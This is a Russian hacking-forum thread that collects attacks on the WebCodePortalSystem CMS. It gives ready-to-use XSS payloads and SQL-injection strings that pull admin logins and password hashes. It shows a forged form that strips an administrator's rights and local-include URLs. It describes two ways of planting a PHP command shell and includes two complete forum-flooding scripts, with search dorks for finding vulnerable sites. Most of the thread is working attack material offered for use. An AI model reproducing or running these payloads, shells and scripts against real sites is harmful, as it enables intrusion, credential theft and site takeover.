Форум АНТИЧАТ - [ Обзор уязвимостей WCPS ]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [ Обзор уязвимостей WCPS ] (https://forum.antichat.xyz/showthread.php?t=50646)

[ Обзор уязвимостей Wcps ]

Уязвимости WebCodePortalSystem:

WebCodePortalSystem <= 3.7.1 - SQL инъекции, Пассивные XSS (c) I-I()/Ib

WebCodePortalSystem <= 3.8.3.1 - Общая информация, Активная XSS, SQL инъекция (+видео), Способ заливки шелла (c) Grey

WebCodePortalSystem <= 4.0.1 - Активная XSS (c) Grey

WebCodePortalSystem <= 4.0.1 - SQL инъекция (c) Grey

WebCodePortalSystem <= 4.0.1 - Флудилка форума (c) Grey

WebCodePortalSystem <= 4.0.1 - Пассивная XSS, SQL инъекция (c) I-I()/Ib

WebCodePortalSystem <= 4.0.1 - сплойт под SQL инъекцию (c) I-I()/Ib

WebCodePortalSystem <= 4.1 - SQL инъекция: "понижение прав админа" (+видео) (с) Grey

WebCodePortalSystem <= 4.1 - Пассивные XSS (c) I-I()/Ib

WebCodePortalSystem <= 4.1 - Активная XSS (с) Grey

WebCodePortalSystem <= 4.1 - Локальный инклуд, Пассивная XSS (c) Macro

WebCodePortalSystem <= 4.2.1 - Пассивные XSS (c) I-I()/Ib

WebCodePortalSystem <= 4.2.1 - Перезапись переменных (c) I-I()/Ib

WebCodePortalSystem <= 4.2.1 (4.2.2) - Небольшая статья про использование XSS: "Создание привилегированного пользователя..." (+снифер, +видео) (с) Grey

WebCodePortalSystem <= 4.2.1 - Активная XSS (c) I-I()/Ib

WebCodePortalSystem <= 4.2.1 (4.2.2) - Пассивная XSS (с) Grey

WebCodePortalSystem <= 4.3 - Пассивная XSS (с) Macro

WebCodePortalSystem <= 4.3 - SQL инъекция (+сплойт) (c) I-I()/Ib

WebCodePortalSystem <= 4.3 - Пассивная XSS (с) Grey

WebCodePortalSystem <= 4.3.1 - Пассивные XSS (c) I-I()/Ib

WebCodePortalSystem <= 4.3.1 - Локальный инклуд (c) I-I()/Ib

WebCodePortalSystem <= 4.3.1 - Пассивная XSS (с) Grey

WebCodePortalSystem <= 4.3.1 - Льём шелл... (с) Grey

WebCodePortalSystem <= 4.4.1 - Remote include (+сплойт) (с) I-I()/Ib

WebCodePortalSystem <= 4.4.2 - SQL injection (с) I-I()/Ib

WebCodePortalSystem <= 4.4.3 - SQL injection (с) I-I()/Ib

WebCodePortalSystem <= 5 - SQL injection (с) I-I()/Ib

Уязвимости дополнительных модулей WebCodePortalSystem:

AvtoBloger V2.0 - Пассивная XSS (c) I-I()/Ib

Cates v1.0 - SQL инъекция (+сплойт) (c) I-I()/Ib

NewsTematic 1.1 - Пассивные XSS (c) I-I()/Ib

mod_BigNews1.1/Mod download sql inj - Пассивные XSS/SQL инъекция (c) gibson

=============== =============== =============== ===============

WebCodePortalSystem
http://wcps.ru/

Насчет версий не знаю. Точно уязвима версия 3.7.1 именно в ней я баги и нашел. Проверял около полгода назад только сейчас руки дошли опубликовать...

Mysql-injection: Параметр User-agent в заголовках пакетов фильтруется только на drop, delete, union, char, benchmark

Mysql-injection: Параметр xxxxxxxxx_id_wcps в Cookie не фильтруется никак. Уязвимый скрипт: aut.php

XSS:

Код:

http://test2.ru/php/wojs.php?tit=xss</title><body onload=javascript:alert('xss')>

http://test2.ru/php/wojs.php?name_titl=xss</title><body onload=javascript:alert('xss')>

http://test2.ru/php/wojs.php?inflang=alert('xss');

http://test2.ru/php/wojs.php?type=alert('xss');

http://test2.ru/php/wojs.php?bord=');alert('xss');('

http://test2.ru/php/wojs.php?bg=');alert('xss');('

http://test2.ru/php/wojs.php?bgz=');alert('xss');('

http://test2.ru/php/wojs.php?zag=');alert('xss');('

http://test2.ru/php/wojs.php?txt=');alert('xss');('

http://test2.ru/php/wojs.php?fs=');alert('xss');('

http://test2.ru/php/wojs.php?cnt=');alert('xss');('

http://test2.ru/php/wojs.php?wd=');alert('xss');('

http://test2.ru/php/wojs.php?tit=');alert('xss');('

http://test2.ru/php/wojs.php?simage=');alert('xss');('

http://test2.ru/php/wojs.php?hover=');alert('xss');('

http://test2.ru/php/wojs.php?vdata=');alert('xss');('

WebCodePortalSystem <= v. 3.8.3.1 + ВИДЕО (исправил ошибку с кодеком - теперь и весит два метра и открываться должно без проблем)

[ОБЩАЯ ИНФОРМАЦИЯ]

Стандартный префикс - wc_
Тип хеша - md5(password)
Таблица с пользователями - [префикс]_user

Для поиска сайтов с таким движком вводим: WebCodePortalSystem v. 3.8.3.1
Яндекс: http://www.yandex.ru/yandsearch?clid=9582&text=WebCodePortalSystem+v.+3 .8.3.1
Гугл: http://www.google.ru/search?hl=ru&q=WebCodePortalSystem+v.+3.8.3.1&btnG =%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=& aq=t&oq=

[УЯЗВИМОСТИ (версия WebCodePortalSystem v. 3.8.3.1 - на момент написания самая новая)]

[1] [Активная XSS]

Нет фильтрации в referer е, формируем пакет:

Код:

GET /index.php HTTP/1.1

Host: test2.ru

Referer: http://<IMG SRC=javascript:alert('test');>

Connection: close

Далее при просмотре страницы Статистика - Переходы видим выполнение скрипта.

[2] [SQL инъекция]

Уязвим скрипт гостевой книги, скрипт add.php

Заходим в сфой профиль, "Аккаунт" и в поле "URL Вашего Сайта:" вводим следующее:

',version(),'','1','1')#

Символ # так же как и /* - символ конца строки

Дальше заходим в гостевую книгу и видим в поле "URL вашего сайта:" введенную нами скулю, в поле с текстом сообщения вводим что угодно - не имеет значения (но не оставляем пустым и сильно маленьким - 5-6 символов норм).
Добавляем сообщение и видим результат работы подзапроса вместо текста сообщения, в данном случае будет выведена версия БД. К сожалению из-за ограничения на длинну вставить нормальный подзапрос не полчучится + еще одна не приятная особенность - поставленные пробелы не учитываются, поэтому придется использовать кавычки:

',(select"123"),'','1','1')# - будет выведенно 123

К сожалению от запроса ограниченного по длинне току мало, но сдаваться не хорошо, поэтму я нашел способ как это можно обойти.

И так, у нас есть параметр в котором кавычка не фильтруется, это "URL вашего сайта:", следовательно если мы подставим кавычку то сможем менять наш запрос, да вот кстати сам запрос:

PHP код:


		
			
mysql_query("INSERT INTO ".$wcpref."guestbook VALUES ('','$now','$eigbname','$eigbmail','$eigburl    МЫ ВНЕДРЯМСЯ ЗДЕСЬ    ','$eigbtext$attach_text','','$eiloggedstatus','$eigbsname')

Единственый параметр который мы можем изменить в этом запросе (после параметра с адресом сайта) это текст сообщения - $eigbtext$attach_text, но в нем, как и вдругих кавычки фильтуруются, но использовать кавычки не обязательно, вводим следующее:

URL вашего сайта: ',/*
Текст сообщения: */version(),null,3,3)#

И вот как будет выглядеть запрос:

PHP код:


		
			
mysql_query("INSERT INTO ".$wcpref."guestbook VALUES ('','$now','$eigbname','$eigbmail','',/*','*/version(),null,3,3)

Мешающие нам ',' будет закаментированно (ровно как и все что после #). Да и кстати проблема с пробелами тоже решена - что существенно упрощает построение подзапроса.

И так мы полчаем возможность внедрить sql инъекцию, к примеру вывод логина и хеша пароля пользователя (правда придется составлять два отдельных запроса, т.к. использовать запятую нельзя):

Текст сообщения: */(select user_login from wc_user where id=2),null,3,3)#
Текст сообщения: */(select user_pass from wc_user where id=2),null,3,3)#
URL вашего сайта (в обоих случаях): ',/*

!!!! При регистрации не вводите в URL вашего сайта: ',/* - кавычка будет экранироваться, вводить только при редактирование данных в профиле!!!!!!!
!!!! Уязвимсоть действует только если вы регились на сайте и изменяли в профиле этот параметр, при написание сообщения в гостевой без реги на сайте - кавычка будет экранироваться!!!!!!!

[В АДМИНКЕ]

[Раскрытие абсолютного пути]

В обычный комплект (к примеру версия WebCodePortalSystem v. 3.8.3.1) входит не установленный модуль «Инфо PHP»

Устанавливаем «Инсталл» Инфо PHP, после чего появляется новая опция «Инфо PHP»

[Заливка шелла]

1. Через sql запрос.

Создаем файл с запросом, к примеру файл 1.sql:

select 'код шелла' into outfile 'абсолютный путь/shell.php';

Получаем шелл:

http://site.ru/shell.php

2. Через редактирование меток

«Метки», к примеру метка METKA_STATUS

Добавляем следующий код:

PHP код:


		
			
$kod_shella = '<?php system($HTTP_GET_VARS["cmd"]); ?>';

$file_shell = fopen("shell.php", "w");

fputs($file_shell, $kod_shella);

fclose($file_shell);

Получаем шелл:

http://site.ru/shell.php?cmd=[cmd]

Или инклудим шелл, тогда код:

PHP код:


		
			
include('Адрес до шелла');

И получаем его на главной странице:

http://site.ru/

---------------------------------------------------------------

Видео (весит метра 2):

http://rapidshare.com/files/76360514/heck.rar.html

Описание к видео в файле в аттаче (hek.txt):

WebCodePortalSystem v.4.0.1

[Активная XSS]

Достаточно быстро залатали предыдущие уязвимости, но латали на скорую руку, судя по всему, и активная XSS попрежнему осталась, хотя с ней будет немного больше гемора чем было раньше, но это уже мелочи.

Для обхода филтра воспользуемся вот этим удобным скриптом с помощью которого можно обойти многие фильтры:

http://ha.ckers.org/xss.html#XSScalc

Закодируем нашу строку:

javascript:alert('test'); -> Character Encoding Calculator -> вводим сюда скрипт: ASCII Text -> и получаем его здесь Decimal Value: HTML (without semicolons): -> &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#116&#101&#115&#116&#39&#41&#59

Формируем пакет:

Код:

GET /index.php HTTP/1.1

Host: test2.ru

Referer: http://<IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#116&#101&#115&#116&#39&#41&#59>

Connection: close

Отправляем его и видим результат работы скрипта на страничке со статистикой:

Статистика -> Переходы

WebCodePortalSystem v.4.0.1

[SQL инъекция]

Заходим в новости, открываем любую - опция "Читать", дальше видим надпись "Оценить:".
Лезем в исходник страницы (имеется виду html страницы) к примеру в Опере Вид - Исходный текст

Находим строчку:

Код:

<option value="1">1</option>

И заменяем её на:

Код:

<option value="1,title=(select user_login from wc_user where id=2),photocor=(select user_pass from wc_user where id=2),ntext=null,phototext=null,kritery=null">1</option>

Нажимаем "Применить изменения", после чего выбираем кол-во баллов равное 1, и нажимаем Оценить.

Все теперь если просматривать новости, то в место заголовка текущей новости будет логин админа, а текст новости - хеш его пароля.

Видео (качество плохое, но понять можно):

http://rapidshare.com/files/78277422/heck2.rar.html

WebCodePortalSystem v.4.0.1

[Флудилка форума]

Проверка с картинками сделана криво - после авторизации на форуме вводить символы с картинки не нужно... Вот состряпал две версии флудилки - одна работает медлено, вторая быстрее (но могут не все темы создаваться (к примеру 4-5 из 100 могут не создасться)).

Первая версия:

PHP код:


		
			
<?php

//--Отредактируйте эти данные-------------------------------



$host = 'test2.ru'; // Хост

$port = '80'; // Порт

$dir = '/'; // Директория



$forum_id = '1'; // Номер раздела форума



$cook = '36b8e776d_wcps=af6709cdabc23cdbbb445ac7066f4291'; // Ваши куки. Не забудьте отредактировать! Всего в куках две записи, вам нужна только эта - так в которой лежит сессия!!!



$tema_name = '6666687'; // Название темы

$tema_mess = '5555587'; // Текст сообщения темы



$kol = '10'; // Количество тем, которые будут созданы



//-----------------------------------------------------------

// ================

// Coded by Grey

// ================



$path = $dir.'index.php?nma=forumd&fla=new';

$ref = 'http://'.$host.$dir.'index.php?nma=forumd&fla=new&action=theme&forum='.$forum_id;



$len1 = strlen($tema_name);

$len2 = strlen($tema_mess);



for($i = 0; $i < $kol; $i++)

{

$s = fsockopen($host,$port) or die ('Не удаётся присоединиться к хосту.<br>');



$tema_name .= ($i+1).($i+8);

$tema_mess .= ($i+1).($i+4);



$data = 'action=ok_thema&forum='.$forum_id.'&names='.$tema_name.'&avtor=4&texts='.$tema_mess.'&uved=1&attach_sig=1&referer=topic';

$len_data = strlen($data);



$headers = "POST $path HTTP/1.1\r\nHost: $host\r\nReferer: $ref\r\nCookie: $cook\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $len_data\r\n\r\n$data\r\nConnection: close\r\n\r\n";

fputs($s, $headers);

while(!feof($s))

{

$out_data .= fgets($s);

}

$out_data = '';

$tema_name = substr($tema_name,0,$len1);

$tema_mess = substr($tema_mess,0,$len2);

fclose($s);

echo('Otpravleno soobchenii : '.($i+1)."\r\n");

}



?>

Вторая версия:

PHP код:


		
			
<?php

//--Отредактируйте эти данные-------------------------------



$host = 'test2.ru'; // Хост

$port = '80'; // Порт

$dir = '/'; // Директория



$forum_id = '1'; // Номер раздела форума



$cook = '36b8e776d_wcps=af6709cdabc23cdbbb445ac7066f4291'; // Ваши куки. Не забудьте отредактировать! Всего в куках две записи, вам нужна только эта - так в которой лежит сессия!!!



$tema_name = '6666687'; // Название темы

$tema_mess = '5555587'; // Текст сообщения темы



$kol = '10'; // Количество тем, которые будут созданы



//-----------------------------------------------------------

// ================

// Coded by Grey

// ================



$path = $dir.'index.php?nma=forumd&fla=new';

$ref = 'http://'.$host.$dir.'index.php?nma=forumd&fla=new&action=theme&forum='.$forum_id;



$len1 = strlen($tema_name);

$len2 = strlen($tema_mess);



for($i = 0; $i < $kol; $i++)

{

$s = fsockopen($host,$port) or die ('Не удаётся присоединиться к хосту.<br>');



$tema_name .= ($i+1).($i+8);

$tema_mess .= ($i+1).($i+4);



$data = 'action=ok_thema&forum='.$forum_id.'&names='.$tema_name.'&avtor=4&texts='.$tema_mess.'&uved=1&attach_sig=1&referer=topic';

$len_data = strlen($data);



$headers = "POST $path HTTP/1.1\r\nHost: $host\r\nReferer: $ref\r\nCookie: $cook\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $len_data\r\n\r\n$data\r\nConnection: close\r\n\r\n";

fputs($s, $headers);

$out_data .= fgets($s);

$out_data = '';

$tema_name = substr($tema_name,0,$len1);

$tema_mess = substr($tema_mess,0,$len2);

fclose($s);

echo('Otpravleno soobchenii : '.($i+1)."\r\n");

for($i2 = 0; $i2 < 20000000; $i2++)

{

}

}



?>

Юзаем так:

1) Редактируем в скрипте данные (указываем адрес, номер раздела, !!!и не забываем сессию!!!).

2) Ну а дальше просто юзаем скрипт:

php c:\wcps_forum_flood.php

WebCodePortalSystem v.4.0.1

XSS
Начнем с XSS так как она более юзаема. Находится она в файле mod/comment/index.php в самом конце. Вот уязвимый код:

Код:

if ($nma=='comment'){

        echo '<center>

<a href='.$portal_subdir.'/index.php?nma=catalog&fla=tema&cat_id='.$cat_id.'&page='.$page.'> '._STATINDEX_.'</a>

&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;

<a href='.$portal_subdir.'/index.php?nma=catalog&fla=stat&cat_id='.$cat_id.'&nums='.$ids.'>'._BACKSTAT_."</a>\n";

}

переменная $ids проходит фильтрацию, но не значитильную и как ни странно в фильтре запрещенно слово alert o_O... Ну и вот собственно эксплоит:

Код:

http://test2.ru/index.php?nma=comment&fla=index&ids=sssssssssss%20onClick=document.write(document.cookie)

SQL injection
Скажу сразу иньекция после order by, что оказывает к сожалению весьма пагубное влияние на ее юзаемость. Описывать сильно не буду она того не стоит. Вот так она выглядит:

Код:

http://test2.ru/index.php?nma=catalog&fla=pod_menu&cat_id=1&by=[SQL code]

WebCodePortalSystem V4.1 (новая версия) + ВИДЕО

!!! [Понижение прав админа] !!!

Очень интересная уязвимость позволяет понизить права пользователя. Но она самом деле sql инъекция.

В файле mod/comment/ --> add.php <--

Есть запрос вида:

PHP код:


		
			
MYSQL_QUERY("update `".$wcpref."$tbl` SET $ncomment=$ncomment+1 where id='$per4'");

Очень классно если учесть, что параметры $tbl, $ncomment и $per4 мы можем менять...

Получаем возможность увеличить содержимое любой колонки на 1.

Самое нормальное где это можно применить - это в таблице с пользователями - увеличив значение поля user_uroven на 1 тем самым изменив права пользователя (понизить права).

Права админа: user_uroven = 1
Права пользователя: user_uroven = 3

Значит нам нужно будет провести операцию два раза - но это не проблема.

---------Как делать--------------

Заходим в "Новости", выбираем какую нидь новость (нажимаем "Читать") -> "Добавить комментарий".

Дальше лезем в исходник страницы (в Опере: Вид -> Исходный текст).

Находим вот такую форму:

Код:

        <form action="http://test2.ru/index.php?nma=comment&fla=add" method=post name=form onsubmit="return JScheckForm(this)">

        <TR class=even><TD>Nik:</TD><TD><b>123123123</b></TD></TR>

        <TR class=odd><TD>Ваш E-Mail:</TD><TD><b>123123@213.ru</b></TD></TR>

        <TR class=even><TD colspan=2>Комментарий:</TD></TR>

        <TR class=odd><TD colspan=2><textarea name="per1" cols="65" rows="8" style="width: 100%;"></textarea></TD></TR>

        <TR class=even><TD colspan=2>HTML-теги Вырезаются!!!</TD></TR>

        <TR class=odd><TD> </TD><TD>

        <input type='hidden' name='per4' value="25">

        <input type='hidden' name='per5' value="&fla=stat&cat_id=1&nums=25">

        <input type='hidden' name='mod' value="news">

        <input type='hidden' name='ncomment' value="comments">

        <input type='hidden' name='tbl' value="news_stat">

        <input type='submit' value="Добавить"></TD></TR>

        </form>

И меняем её следующим образом:

Код:

        <form action="http://test2.ru/index.php?nma=comment&fla=add" method=post name=form onsubmit="return JScheckForm(this)">

        <TR class=even><TD>Nik:</TD><TD><b>123123123</b></TD></TR>

        <TR class=odd><TD>Ваш E-Mail:</TD><TD><b>123123@213.ru</b></TD></TR>

        <TR class=even><TD colspan=2>Комментарий:</TD></TR>

        <TR class=odd><TD colspan=2><textarea name="per1" cols="65" rows="8" style="width: 100%;"></textarea></TD></TR>

        <TR class=even><TD colspan=2>HTML-теги Вырезаются!!!</TD></TR>

        <TR class=odd><TD> </TD><TD>

        <input type='hidden' name='per4' value="2">

        <input type='hidden' name='per5' value="&fla=stat&cat_id=1&nums=2">

        <input type='hidden' name='mod' value="news">

        <input type='hidden' name='ncomment' value="user_uroven">

        <input type='hidden' name='tbl' value="user">

        <input type='submit' value="Добавить"></TD></TR>

        </form>

Сохраняем изменения и добавляем коммент (текст коммента не имеет значения - что угодно).

Получится что в таблице user (знать префикс не нужно, он приклеится сам) у пользователя с id = 2 (в данном случае) в поле user_uroven значение увеличится на 1.

Как я уже сказал выше нужно что бы значение было равно 3, а не 2. По этому проделываем операцию еще раз.

Все - пользователь больше не админ.

Видео:

http://rapidshare.com/files/79874554/heck3.rar.html

WebCodePortalSystem V4.1

Ну вот очередная порция багов. Две XSS:

Код:

http://test2.ru/index.php?nma=news&fla=tema&namecat[1']=2</a><body onLoad=eval("ale"+"rt(documen"+"t.cookie)")>

Код:

http://test2.ru/index.php?nma=search&fla=f.lib&name_sm[1']=1'<body onLoad=eval("ale"+"rt(documen"+"t.cookie)")>

WebCodePortalSystem V4.1

Активная XSS:

Код:

GET /index.php HTTP/1.1

Host: test2.ru

Referer: http://<body onLoad=eval("ale"+"rt(documen"+"t.cookie)")>

Connection: close

Локальный инклуд
/php/print_news.php?_SESSION[tema_scan][templates_wcinfoview.php]=1&portal_skin=[some_local_script]%00

Пассивная XSS

Код:

/php/wojs.php?inflang=document.write(unescape(/%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2527%2558%2553%2553%2521%2521%2521%2527%2529%253B%253C%252F%2573%2563%2572%2569%2570%2574%253E/));